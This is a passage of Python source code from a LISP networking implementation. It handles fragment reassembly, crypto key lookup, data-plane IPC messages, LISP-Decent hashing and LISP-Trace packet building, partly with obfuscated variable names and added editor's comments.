    o000O = (Oo0ooo & 0x2000 == 0 and (Oo0ooo & 0x1fff) != 0)
    oo0O00OOOOO = [(Oo0ooo & 0x1fff) * 8, oOi11iIIIIi - 20, packet, o000O]

    if (Oo0ooo == 0x2000):
        oooooO0oO0ooO, iIII1IiI = struct.unpack("HH", packet[20:24])
        oooooO0oO0ooO = socket.ntohs(oooooO0oO0ooO)
        iIII1IiI = socket.ntohs(iIII1IiI)
        if (iIII1IiI not in [4341, 8472, 4789] and oooooO0oO0ooO != 4341):
            lisp_reassembly_queue[OOoo0] = []
            oo0O00OOOOO[2] = None

    if (OOoo0 not in lisp_reassembly_queue):
        lisp_reassembly_queue[OOoo0] = []

    queue = lisp_reassembly_queue[OOoo0]

    if (len(queue) == 1 and queue[0][2] == None):
        dprint("Drop non-LISP encapsulated fragment 0x{}".format(
            lisp_hex_string(OOoo0).zfill(4)))
        return (None)

    queue.append(oo0O00OOOOO)
    queue = sorted(queue)

    IiI = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    IiI.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    o00O0O0 = IiI.print_address_no_iid()
    IiI.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
    I111II11IIii = IiI.print_address_no_iid()
    IiI = red("{} -> {}".format(o00O0O0, I111II11IIii), False)

    dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format(
        bold("Received", False),
        " non-LISP encapsulated" if oo0O00OOOOO[2] == None else "",
        IiI, lisp_hex_string(OOoo0).zfill(4),
        lisp_hex_string(Oo0ooo).zfill(4)))

    if (queue[0][0] != 0 or queue[-1][3] == False): return (None)
    IiI1 = queue[0]
    for Ii in queue[1::]:
        Oo0ooo = Ii[0]
        o0o0oOo, I11iiI1iIiiII = IiI1[0], IiI1[1]
        if (o0o0oOo + I11iiI1iIiiII != Oo0ooo): return (None)
        IiI1 = Ii

    lisp_reassembly_queue.pop(OOoo0)

    packet = queue[0][2]
    for Ii in queue[1::]: packet += Ii[2][20::]

    dprint("{} fragments arrived for packet 0x{}, length {}".format(
        bold("All", False), lisp_hex_string(OOoo0).zfill(4), len(packet)))

    i1iIii = socket.htons(len(packet))
    IiIii1iIIII = packet[0:2] + struct.pack("H", i1iIii) + packet[4:6] + \
        struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
        packet[12:20]

    IiIii1iIIII = lisp_ip_checksum(IiIii1iIIII)
    return (IiIii1iIIII + packet[20::])
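#
# lisp_get_crypto_decap_lookup_key
#
# Find the decap crypto-key entry for addr:port, falling back to addr
# alone, and finally to any addr:* entry whose address part matches (in
# which case the keys are also cached under the bare address).
#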
def lisp_get_crypto_decap_lookup_key(addr, port):
    O0O0 = addr.print_address_no_iid() + ":" + str(port)
    if (O0O0 in lisp_crypto_keys_by_rloc_decap): return (O0O0)

    O0O0 = addr.print_address_no_iid()
    if (O0O0 in lisp_crypto_keys_by_rloc_decap): return (O0O0)

    for I1OO in lisp_crypto_keys_by_rloc_decap:
        OO0O00o0 = I1OO.split(":")
        if (len(OO0O00o0) == 1): continue
        OO0O00o0 = OO0O00o0[0] if len(OO0O00o0) == 2 else ":".join(OO0O00o0[0:-1])
        if (OO0O00o0 == O0O0):
            iI1iiiiiii = lisp_crypto_keys_by_rloc_decap[I1OO]
            lisp_crypto_keys_by_rloc_decap[O0O0] = iI1iiiiiii
            return (O0O0)

    return (None)
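#
# lisp_build_crypto_decap_lookup_key
#
# Decide whether decap keys for this peer should be stored under "addr"
# or "addr:port". An RTR appears to key by address for RLOC-probing
# xTRs, but by addr:port for xTRs behind a NAT (those found in
# lisp_nat_state_info).
#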
def lisp_build_crypto_decap_lookup_key(addr, port):
    addr = addr.print_address_no_iid()
    OOo0o0o = addr + ":" + str(port)

    if (lisp_i_am_rtr):
        if (addr in lisp_rloc_probe_list): return (addr)

        for iII1ii1 in list(lisp_nat_state_info.values()):
            for Iiii1iiI in iII1ii1:
                if (addr == Iiii1iiI.address): return (OOo0o0o)

        return (addr)

    return (OOo0o0o)
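#
# lisp_set_ttl
#
# Set the unicast and multicast TTL for packets sent on 'lisp_socket',
# logging (and continuing) when the platform does not support it.
#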
def lisp_set_ttl(lisp_socket, ttl):
    try:
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
    except:
        lprint("socket.setsockopt(IP_TTL) not supported")
    return
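#
# lisp_is_rloc_probe_request / lisp_is_rloc_probe_reply
#
# Inspect the first byte of a LISP control header: 0x12 appears to be a
# Map-Request with the probe bit set, 0x28 a Map-Reply with the probe
# bit set.
#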
def lisp_is_rloc_probe_request(lisp_type):
    lisp_type = struct.unpack("B", lisp_type)[0]
    return (lisp_type == 0x12)
def lisp_is_rloc_probe_reply(lisp_type):
    lisp_type = struct.unpack("B", lisp_type)[0]
    return (lisp_type == 0x28)
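#
# lisp_is_rloc_probe
#
# Given a pcap'ed IPv4 packet, decide whether it is a UDP RLOC-probe to
# or from the LISP control port. 'rr' selects the check: 0 for
# requests, 1 for replies, -1 for either. Returns [lisp-packet, source,
# port, ttl], a list of Nones when the probe was sourced locally, or the
# original packet with None fields when it is not a probe.
#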
def lisp_is_rloc_probe(packet, rr):
    O0I1II1 = (struct.unpack("B", packet[9:10])[0] == 17)
    if (O0I1II1 == False): return ([packet, None, None, None])

    oooooO0oO0ooO = struct.unpack("H", packet[20:22])[0]
    iIII1IiI = struct.unpack("H", packet[22:24])[0]
    o0O0O0OoO = (socket.htons(LISP_CTRL_PORT) in [oooooO0oO0ooO, iIII1IiI])
    if (o0O0O0OoO == False): return ([packet, None, None, None])

    if (rr == 0):
        Oooooo0OOO = lisp_is_rloc_probe_request(packet[28:29])
        if (Oooooo0OOO == False): return ([packet, None, None, None])
    elif (rr == 1):
        Oooooo0OOO = lisp_is_rloc_probe_reply(packet[28:29])
        if (Oooooo0OOO == False): return ([packet, None, None, None])
    elif (rr == -1):
        Oooooo0OOO = lisp_is_rloc_probe_request(packet[28:29])
        if (Oooooo0OOO == False):
            Oooooo0OOO = lisp_is_rloc_probe_reply(packet[28:29])
            if (Oooooo0OOO == False): return ([packet, None, None, None])

    O0oo0OoO0oo = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    O0oo0OoO0oo.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])

    if (O0oo0OoO0oo.is_local()): return ([None, None, None, None])

    O0oo0OoO0oo = O0oo0OoO0oo.print_address_no_iid()
    ooO0 = socket.ntohs(struct.unpack("H", packet[20:22])[0])
    O0O00O = struct.unpack("B", packet[8:9])[0] - 1
    packet = packet[28::]

    iiiI1I = bold("Receive(pcap)", False)
    o0OoO0 = bold("from " + O0oo0OoO0oo, False)
    iIIiiIi = lisp_format_packet(packet)
    lprint("{} {} bytes {} {}, packet: {}".format(iiiI1I, len(packet), o0OoO0,
        ooO0, iIIiiIi))

    return ([packet, O0oo0OoO0oo, ooO0, O0O00O])
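#
# lisp_ipc_write_xtr_parameters
#
# Push global xTR parameters (logging flags, whether this process is an
# RTR) to the data-plane.
#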
def lisp_ipc_write_xtr_parameters(cp, dp):
    if (lisp_ipc_dp_socket == None): return

    OO = {"type": "xtr-parameters", "control-plane-logging": cp,
        "data-plane-logging": dp, "rtr": lisp_i_am_rtr}

    lisp_write_to_dp_socket(OO)
    return
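#
# lisp_external_data_plane
#
# Return True when an external data-plane is in use, i.e. when
# "ipc-data-plane = yes" is configured or the LISP_RUN_LISP_XTR
# environment variable is set.
#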
def lisp_external_data_plane():
    oO00o00 = 'egrep "ipc-data-plane = yes" ./lisp.config'
    if (getoutput(oO00o00) != ""): return (True)

    if (os.getenv("LISP_RUN_LISP_XTR") != None): return (True)
    return (False)
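#
# lisp_process_data_plane_restart
#
# The external data-plane restarted: touch lisp.config so configuration
# is re-read, then replay the entire map-cache over IPC (or an empty
# cache when 'do_clear' is set).
#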

#
# lisp_process_data_plane_restart
#
# The external data plane restarted. Touch the lisp.config file so the
# configuration is re-read and pushed down, then send the entire map-cache
# over the IPC socket (an empty entry list when do_clear is set).
#
def lisp_process_data_plane_restart(do_clear=False):
    os.system("touch ./lisp.config")

    jdata = { "type" : "entire-map-cache", "entries" : [] }

    if (do_clear == False):
        entries = jdata["entries"]
        lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)

    lisp_write_to_dp_socket(jdata)
    return
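
#
# Editor's note: the "entire-map-cache" IPC message written above has this
# shape, with one dict per map-cache entry produced by
# lisp_ipc_walk_map_cache() below:
#
# { "type" : "entire-map-cache", "entries" : [ ... ] }
#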

#
# lisp_process_data_plane_stats
#
# Process a "statistics" IPC message from the data plane. Add the per-RLOC
# packet/byte counts to the matching map-cache entries and refresh unicast
# entries whose TTL has elapsed.
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
    if ("entries" not in msg):
        lprint("No 'entries' in stats IPC message")
        return

    if (type(msg["entries"]) != list):
        lprint("'entries' in stats IPC message must be an array")
        return

    for msg in msg["entries"]:
        if ("eid-prefix" not in msg):
            lprint("No 'eid-prefix' in stats IPC message")
            continue
        eid_str = msg["eid-prefix"]

        if ("instance-id" not in msg):
            lprint("No 'instance-id' in stats IPC message")
            continue
        iid = int(msg["instance-id"])

        #
        # Lookup the EID-prefix in the map-cache.
        #
        eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
        eid.store_prefix(eid_str)
        mc = lisp_map_cache_lookup(None, eid)
        if (mc == None):
            lprint("Map-cache entry for {} not found for stats update".format(
                eid_str))
            continue

        if ("rlocs" not in msg):
            lprint("No 'rlocs' in stats IPC message for {}".format(eid_str))
            continue
        if (type(msg["rlocs"]) != list):
            lprint("'rlocs' in stats IPC message must be an array")
            continue
        ipc_rlocs = msg["rlocs"]

        #
        # Loop through the RLOCs in the IPC message.
        #
        for ipc_rloc in ipc_rlocs:
            if ("rloc" not in ipc_rloc): continue

            rloc_str = ipc_rloc["rloc"]
            if (rloc_str == "no-address"): continue

            rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
            rloc.store_address(rloc_str)

            rloc_entry = mc.get_rloc(rloc)
            if (rloc_entry == None): continue

            #
            # Add the data-plane counters to the control-plane counters.
            #
            pc = 0 if ("packet-count" not in ipc_rloc) else \
                ipc_rloc["packet-count"]
            bc = 0 if ("byte-count" not in ipc_rloc) else \
                ipc_rloc["byte-count"]
            ts = 0 if ("seconds-last-packet" not in ipc_rloc) else \
                ipc_rloc["seconds-last-packet"]

            rloc_entry.stats.packet_count += pc
            rloc_entry.stats.byte_count += bc
            rloc_entry.stats.last_increment = lisp_get_timestamp() - ts

            lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
                ts, eid_str, rloc_str))

        #
        # Refresh a unicast map-cache entry whose TTL has elapsed by sending
        # a new Map-Request.
        #
        if (mc.group.is_null() and mc.has_ttl_elapsed()):
            eid_str = green(mc.print_eid_tuple(), False)
            lprint("Refresh map-cache entry {}".format(eid_str))
            lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)

    return
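
#
# Example (editor's sketch): the "statistics" IPC message shape consumed by
# lisp_process_data_plane_stats() above. Counter values are illustrative.
#
example_stats_msg = {
    "type" : "statistics",
    "entries" : [
        { "eid-prefix" : "10.0.0.0/8", "instance-id" : "0",
          "rlocs" : [ { "rloc" : "192.168.1.1", "packet-count" : 10,
              "byte-count" : 1400, "seconds-last-packet" : 2 } ] }
    ]
}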

#
# lisp_process_data_plane_decap_stats
#
# Process a "decap-statistics" IPC message. The ITR relays the message to
# the lisp-etr process; the ETR/RTR adds the counts to lisp_decap_stats.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):

    #
    # If we are an ITR, relay the message to the lisp-etr process.
    #
    if (lisp_i_am_itr):
        lprint("Send decap-stats IPC message to lisp-etr process")
        ipc = "stats%{}".format(json.dumps(msg))
        ipc = lisp_command_ipc(ipc, "lisp-itr")
        lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
        return

    #
    # Process stats. When relayed by the ITR, the message arrives in the
    # ETR as a JSON string and needs decoding first.
    #
    ipc = bold("IPC", False)
    lprint("Process decap-stats {} message: '{}'".format(ipc, msg))

    if (lisp_i_am_etr): msg = json.loads(msg)

    key_names = ["good-packets", "ICV-error", "checksum-error",
        "lisp-header-error", "no-decrypt-key", "bad-inner-version",
        "outer-header-error"]

    for key_name in key_names:
        pc = 0 if (key_name not in msg) else msg[key_name]["packet-count"]
        lisp_decap_stats[key_name].packet_count += pc

        bc = 0 if (key_name not in msg) else msg[key_name]["byte-count"]
        lisp_decap_stats[key_name].byte_count += bc

        ts = 0 if (key_name not in msg) else \
            msg[key_name]["seconds-last-packet"]
        lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts

    return
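
#
# Example (editor's sketch): shape of a "decap-statistics" IPC message, per
# the keys consumed above. Counter values are illustrative.
#
example_decap_stats_msg = {
    "type" : "decap-statistics",
    "good-packets" : { "packet-count" : 100, "byte-count" : 88000,
        "seconds-last-packet" : 1 },
    "ICV-error" : { "packet-count" : 0, "byte-count" : 0,
        "seconds-last-packet" : 0 }
}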

#
# lisp_process_punt
#
# Process a punt IPC message from the data plane. It is either a statistics,
# decap-statistics, restart, or discovery message. Discovery messages drive
# dynamic-EID discovery and Map-Request generation.
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
    message, source = punt_socket.recvfrom(4000)

    msg = json.loads(message)
    if (type(msg) != dict):
        lprint("Invalid punt message from {}, not in JSON format".format(
            source))
        return

    punt = bold("Punt", False)
    lprint("{} message from '{}': '{}'".format(punt, source, msg))

    if ("type" not in msg):
        lprint("Punt IPC message has no 'type' key")
        return

    #
    # Process statistics messages.
    #
    if (msg["type"] == "statistics"):
        lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
        return
    if (msg["type"] == "decap-statistics"):
        lisp_process_data_plane_decap_stats(msg, punt_socket)
        return

    #
    # Process restart message.
    #
    if (msg["type"] == "restart"):
        lisp_process_data_plane_restart()
        return

    #
    # Process discovery message.
    #
    if (msg["type"] != "discovery"):
        lprint("Punt IPC message has wrong format")
        return
    if ("interface" not in msg):
        lprint("Invalid punt message from {}, required keys missing".format(
            source))
        return

    #
    # Get instance-id for the interface the packet arrived on.
    #
    device = msg["interface"]
    if (device == ""):
        iid = int(msg["instance-id"])
        if (iid == -1): return
    else:
        iid = lisp_get_interface_instance_id(device, None)

    #
    # Validate source-EID, if present in the message.
    #
    seid = None
    if ("source-eid" in msg):
        source_eid = msg["source-eid"]
        seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
        if (seid.is_null()):
            lprint("Invalid source-EID format '{}'".format(source_eid))
            return

    deid = None
    if ("dest-eid" in msg):
        dest_eid = msg["dest-eid"]
        deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
        if (deid.is_null()):
            lprint("Invalid dest-EID format '{}'".format(dest_eid))
            return

    #
    # Do source-EID discovery when the source is a configured dynamic-EID.
    #
    if (seid):
        e = green(seid.print_address(), False)
        db = lisp_db_for_lookups.lookup_cache(seid, False)
        if (db != None):
            if (db.dynamic_eid_configured()):
                interface = lisp_allow_dynamic_eid(device, seid)
                if (interface != None and lisp_i_am_itr):
                    #
                    # Editor's note: the original call passed 4 arguments;
                    # lisp_itr_discover_eid() takes 5, so the punt socket is
                    # supplied as the IPC socket argument here.
                    #
                    lisp_itr_discover_eid(db, seid, device, interface,
                        punt_socket)
                else:
                    lprint(("Disallow dynamic source-EID {} " +
                        "on interface {}").format(e, device))
        else:
            lprint("Punt from non-EID source {}".format(e))

    #
    # Send Map-Request if no map-cache entry exists for the destination EID
    # or the entry requires a requery.
    #
    if (deid):
        mc = lisp_map_cache_lookup(seid, deid)
        if (mc == None or lisp_mr_or_pubsub(mc.action)):
            #
            # Rate-limit Map-Requests.
            #
            if (lisp_rate_limit_map_request(deid)): return

            pubsub = (mc and mc.action == LISP_SEND_PUBSUB_ACTION)
            lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
                seid, deid, None, pubsub)
        else:
            e = green(deid.print_address(), False)
            lprint("Map-cache entry for {} already exists".format(e))

    return
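
#
# Example (editor's sketch): a "discovery" punt message of the shape parsed
# above. Addresses and interface name are illustrative; "instance-id" is
# consulted only when "interface" is empty.
#
example_discovery_msg = {
    "type" : "discovery", "interface" : "eth0",
    "source-eid" : "10.1.1.1", "dest-eid" : "10.2.2.2",
    "instance-id" : "0"
}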

#
# lisp_ipc_map_cache_entry
#
# Encode one map-cache entry for the IPC message and append it to jdata.
# Callback used by lisp_ipc_walk_map_cache() below.
#
def lisp_ipc_map_cache_entry(mc, jdata):
    entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
    jdata.append(entry)
    return([True, jdata])

#
# lisp_ipc_walk_map_cache
#
# Walk map-cache entries, appending each one to the jdata array.
#
def lisp_ipc_walk_map_cache(mc, jdata):
    #
    # There is only destination state in this map-cache entry.
    #
    if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))

    if (mc.source_cache == None): return([True, jdata])

    #
    # There is (source, group) state so walk all sources for this group
    # entry.
    #
    jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
    return([True, jdata])
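
#
# Example (editor's sketch): collecting the entire map-cache as a list of
# JSON-ready entries, the same way lisp_process_data_plane_restart() above
# uses this walker.
#
# entries = []
# lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#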

#
# lisp_itr_discover_eid
#
# Put dynamic-EID state in the database-mapping entry and tell the lisp-etr
# process so it can register the dynamic-EID.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
    lisp_ipc_listen_socket):
    eid_str = eid.print_address()
    if (eid_str in db.dynamic_eids):
        db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
        return

    #
    # Add dynamic-EID state.
    #
    dyn_eid = lisp_dynamic_eid()
    dyn_eid.dynamic_eid.copy_address(eid)
    dyn_eid.interface = routed_interface
    dyn_eid.last_packet = lisp_get_timestamp()
    dyn_eid.get_timeout(routed_interface)
    db.dynamic_eids[eid_str] = dyn_eid

    routed = ""
    if (input_interface != routed_interface):
        routed = ", routed-interface " + routed_interface

    eid_string = green(eid_str, False) + bold(" discovered", False)
    lprint("Dynamic-EID {} on interface {}{}, timeout {}".format(eid_string,
        input_interface, routed, dyn_eid.timeout))

    #
    # Tell the lisp-etr process so it can register the dynamic-EID.
    #
    ipc = "learn%{}%{}".format(eid_str, routed_interface)
    ipc = lisp_command_ipc(ipc, "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
    return

#
# lisp_retry_decap_keys
#
# A packet failed its ICV check. Try other stored decap keys for the same
# RLOC address (keys are stored per "<address>:<port>") and switch to one
# that passes the ICV test.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
    if (lisp_search_decap_keys == False): return

    #
    # Only search when addr_str is a bare address; entries that already
    # include a port are the search candidates.
    #
    if (addr_str.find(":") != -1): return

    entry = lisp_crypto_keys_by_rloc_decap[addr_str]

    for key in lisp_crypto_keys_by_rloc_decap:

        #
        # Look only at entries for the same RLOC address, skipping this one.
        #
        if (key.find(addr_str) == -1): continue
        if (key == addr_str): continue

        #
        # Skip entries that hold the same crypto key.
        #
        keys = lisp_crypto_keys_by_rloc_decap[key]
        if (keys == entry): continue

        #
        # Try the ICV check with this candidate key.
        #
        crypto_key = keys[1]
        if (packet_icv != crypto_key.do_icv(packet, iv)):
            lprint("Test ICV with key {} failed".format(red(key, False)))
            continue

        lprint("Changing decap crypto key to {}".format(red(key, False)))
        lisp_crypto_keys_by_rloc_decap[addr_str] = keys

    return

#
# lisp_decent_pull_xtr_configured
#
# Return True if the LISP-Decent pull-based mapping system is configured.
#
def lisp_decent_pull_xtr_configured():
    return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)

#
# lisp_is_decent_dns_suffix
#
# Return True if the supplied DNS name ends in the configured LISP-Decent
# DNS suffix (everything after the first label).
#
def lisp_is_decent_dns_suffix(dns_name):
    if (lisp_decent_dns_suffix == None): return(False)
    name = dns_name.split(".")
    name = ".".join(name[1::])
    return(name == lisp_decent_dns_suffix)

#
# lisp_get_decent_index
#
# Hash the EID-prefix with HMAC-SHA256 (key "lisp-decent") and mod the
# leading hex digits of the digest by the configured modulus.
#
def lisp_get_decent_index(eid):
    eid_str = eid.print_prefix()

    #
    # Editor's fix: encode the prefix string so hmac accepts it on Python 3.
    #
    hash_value = hmac.new(b"lisp-decent", eid_str.encode(),
        hashlib.sha256).hexdigest()

    #
    # The hash width in bytes can be set with an env variable; double it to
    # get a hex-digit width. Default is 12 hex digits (6 bytes).
    #
    hash_width = os.getenv("LISP_DECENT_HASH_WIDTH")
    if (hash_width in ["", None]):
        hash_width = 12
    else:
        hash_width = int(hash_width)
        if (hash_width > 32):
            hash_width = 12
        else:
            hash_width *= 2

    hash_value = hash_value[0:hash_width]
    index = int(hash_value, 16) % lisp_decent_modulus

    lprint("LISP-Decent modulus {}, hash-width {}, mod-value {}, index {}". \
        format(lisp_decent_modulus, old_div(hash_width, 2), hash_value,
        index))

    return(index)
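
#
# Example (editor's sketch): computing a LISP-Decent index by hand, mirroring
# lisp_get_decent_index() above with the default 12-hex-digit width. The
# prefix string and modulus are illustrative.
#
def example_decent_index(eid_prefix, modulus=16, hex_width=12):
    h = hmac.new(b"lisp-decent", eid_prefix.encode(), hashlib.sha256)
    return(int(h.hexdigest()[0:hex_width], 16) % modulus)

#
# example_decent_index("[0]10.0.0.0/8") returns a value in range(16), so the
# EID-prefix maps to DNS name "<index>.<lisp_decent_dns_suffix>".
#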

#
# lisp_get_decent_dns_name
#
# Build the LISP-Decent map-server DNS name "<index>.<dns-suffix>" for an
# EID.
#
def lisp_get_decent_dns_name(eid):
    index = lisp_get_decent_index(eid)
    return(str(index) + "." + lisp_decent_dns_suffix)

#
# lisp_get_decent_dns_name_from_str
#
# Same as lisp_get_decent_dns_name() but takes the EID as an instance-id
# and address string.
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
    eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
    index = lisp_get_decent_index(eid)
    return(str(index) + "." + lisp_decent_dns_suffix)

#
# lisp_trace_append
#
# Append a JSON node for this xTR to the LISP-Trace payload inside the
# packet and fix up the UDP and IP headers. When the destination RLOC is
# unknown, return the trace to the sender RLOC and return False so the
# caller does not forward the packet.
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
    rloc_entry=None):

    offset = 28 if packet.inner_version == 4 else 48
    trace_packet = packet.packet[offset::]
    trace = lisp_trace()
    if (trace.decode(trace_packet) == False):
        lprint("Could not decode JSON portion of a LISP-Trace packet")
        return(False)

    next_rloc = "?" if packet.outer_dest.is_null() else \
        packet.outer_dest.print_address_no_iid()

    #
    # Display the encap port when it is not the standard data port.
    #
    if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
        if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)

    #
    # Build the JSON node for this xTR.
    #
    entry = {}
    entry["n"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
        "RTR" if lisp_i_am_rtr else "?"

    srloc = packet.outer_source
    if (srloc.is_null()): srloc = lisp_myrlocs[0]
    entry["sr"] = srloc.print_address_no_iid()

    #
    # In the ITR, record the originating inner source port too.
    #
    if (entry["n"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
        entry["sr"] += ":{}".format(packet.inner_sport)

    entry["hn"] = lisp_hostname
    key = ed[0] + "ts"
    entry[key] = lisp_get_timestamp()

    #
    # In an ETR with no outer header, get the dest-RLOC from the
    # database-mapping.
    #
    if (next_rloc == "?" and entry["n"] == "ETR"):
        db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
        if (db != None and len(db.rloc_set) >= 1):
            next_rloc = db.rloc_set[0].rloc.print_address_no_iid()

    entry["dr"] = next_rloc

    #
    # Record the drop reason when the dest-RLOC is unknown.
    #
    if (next_rloc == "?" and reason != None):
        entry["dr"] += " ({})".format(reason)

    #
    # Add recent RLOC-probe RTTs, hop-counts, and latencies.
    #
    if (rloc_entry != None):
        entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
        entry["hops"] = rloc_entry.recent_rloc_probe_hops
        entry["lats"] = rloc_entry.recent_rloc_probe_latencies

    #
    # Append this node to the path array for the packet's direction.
    #
    seid = packet.inner_source.print_address()
    deid = packet.inner_dest.print_address()
    if (trace.packet_json == []):
        jdata = {}
        jdata["se"] = seid
        jdata["de"] = deid
        jdata["paths"] = []
        trace.packet_json.append(jdata)

    for jdata in trace.packet_json:
        if (jdata["de"] != deid): continue
        jdata["paths"].append(entry)
        break

    #
    # If we are the destination ETR of the trace, add the return direction
    # and turn the packet around.
    #
    swap = False
    if (len(trace.packet_json) == 1 and entry["n"] == "ETR" and
        trace.myeid(packet.inner_dest)):
        jdata = {}
        jdata["se"] = deid
        jdata["de"] = seid
        jdata["paths"] = []
        trace.packet_json.append(jdata)
        swap = True

    #
    # Print the trace and re-encode the JSON payload.
    #
    trace.print_trace()
    trace_packet = trace.encode()

    #
    # If the next-hop RLOC is unknown, return the trace to the sender RLOC.
    #
    sender_rloc = trace.packet_json[0]["paths"][0]["sr"]
    if (next_rloc == "?"):
        lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
        trace.return_to_sender(lisp_socket, sender_rloc, trace_packet)
        return(False)

    #
    # Fix up the UDP length and checksum (checksum required for IPv6).
    #
    length = trace.packet_length()

    headers = packet.packet[0:offset]
    udp = struct.pack("HH", socket.htons(length), 0)
    headers = headers[0:offset - 4] + udp
    if (packet.inner_version == 6 and entry["n"] == "ETR" and
        len(trace.packet_json) == 2):
        udp_header = headers[offset - 8::] + trace_packet
        udp_header = lisp_udp_checksum(seid, deid, udp_header)
        headers = headers[0:offset - 8] + udp_header[0:8]

    #
    # Swap IP addresses and UDP ports when returning the packet to the
    # trace source.
    #
    if (swap):
        if (packet.inner_version == 4):
            headers = headers[0:12] + headers[16:20] + headers[12:16] + \
                headers[22:24] + headers[20:22] + headers[24::]
        else:
            headers = headers[0:8] + headers[24:40] + headers[8:24] + \
                headers[42:44] + headers[40:42] + headers[44::]

        d = packet.inner_dest
        packet.inner_dest = packet.inner_source
        packet.inner_source = d

    #
    # Fix up the IP length and, for IPv4, the header checksum.
    #
    offset = 2 if packet.inner_version == 4 else 4
    ip_length = 20 + length if packet.inner_version == 4 else length
    length_field = struct.pack("H", socket.htons(ip_length))
    headers = headers[0:offset] + length_field + headers[offset + 2::]

    if (packet.inner_version == 4):
        checksum = struct.pack("H", 0)
        headers = headers[0:10] + checksum + headers[12::]
        headers = lisp_ip_checksum(headers[0:20]) + headers[20::]

    packet.packet = headers + trace_packet
    return(True)
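
#
# Example (editor's sketch): the JSON carried in a LISP-Trace packet after
# an ITR and the destination ETR have appended their nodes, per the keys
# written above ("ets"/"dts" are encap/decap timestamps). Values are
# illustrative.
#
example_trace_json = [
    { "se" : "10.1.1.1", "de" : "10.2.2.2",
      "paths" : [
          { "n" : "ITR", "sr" : "192.168.1.1:4610", "hn" : "itr1",
            "ets" : 1700000000.0, "dr" : "192.168.2.1" },
          { "n" : "ETR", "sr" : "192.168.2.1", "hn" : "etr1",
            "dts" : 1700000000.1, "dr" : "10.2.2.2" } ] }
]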

#
# lisp_allow_gleaning
#
# Check the lisp_glean_mappings array to see if gleaning is allowed for the
# supplied EID, group, and RLOC. Returns (allow, rloc-probe, igmp-query).
#
def lisp_allow_gleaning(eid, group, rloc):
    if (lisp_glean_mappings == []): return(False, False, False)

    for entry in lisp_glean_mappings:
        if ("instance-id" in entry):
            iid = eid.instance_id
            low, high = entry["instance-id"]
            if (iid < low or iid > high): continue

        if ("eid-prefix" in entry):
            e = copy.deepcopy(entry["eid-prefix"])
            e.instance_id = eid.instance_id
            if (eid.is_more_specific(e) == False): continue

        if ("group-prefix" in entry):
            if (group == None): continue
            g = copy.deepcopy(entry["group-prefix"])
            g.instance_id = group.instance_id
            if (group.is_more_specific(g) == False): continue

        if ("rloc-prefix" in entry):
            if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
                == False): continue

        return(True, entry["rloc-probe"], entry["igmp-query"])

    return(False, False, False)
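
#
# Editor's note: each lisp_glean_mappings entry is a dict that may contain
# "instance-id" (a [low, high] pair), "eid-prefix", "group-prefix", and
# "rloc-prefix" (address objects matched with is_more_specific()), plus the
# booleans "rloc-probe" and "igmp-query" returned to the caller.
#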

#
# lisp_build_gleaned_multicast
#
# Add or update a gleaned (*, G) map-cache entry with an RLE node for the
# gleaned source EID.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
    group_str = geid.print_address()
    seid_name = seid.print_address_no_iid()
    s = green("{}".format(seid_name), False)
    e = green("(*, {})".format(group_str), False)
    r = red(rloc.print_address_no_iid() + ":" + str(port), False)

    #
    # Lookup (*, G) entry; create one if it does not exist.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc == None):
        mc = lisp_mapping("", "", [])
        mc.group.copy_address(geid)
        mc.eid.copy_address(geid)
        mc.eid.address = 0
        mc.eid.mask_len = 0
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_IGMP_TTL
        mc.gleaned = True
        mc.add_cache()
        lprint("Add gleaned EID {} to map-cache".format(e))

    #
    # Find the RLE node for this source EID, if one exists.
    #
    rloc_entry = rle = rle_node = None
    if (mc.rloc_set != []):
        rloc_entry = mc.rloc_set[0]
        if (rloc_entry.rle):
            rle = rloc_entry.rle
            for node in rle.rle_nodes:
                if (node.rloc_name != seid_name): continue
                rle_node = node
                break

    #
    # Create RLOC entry, RLE, and RLE node as needed.
    #
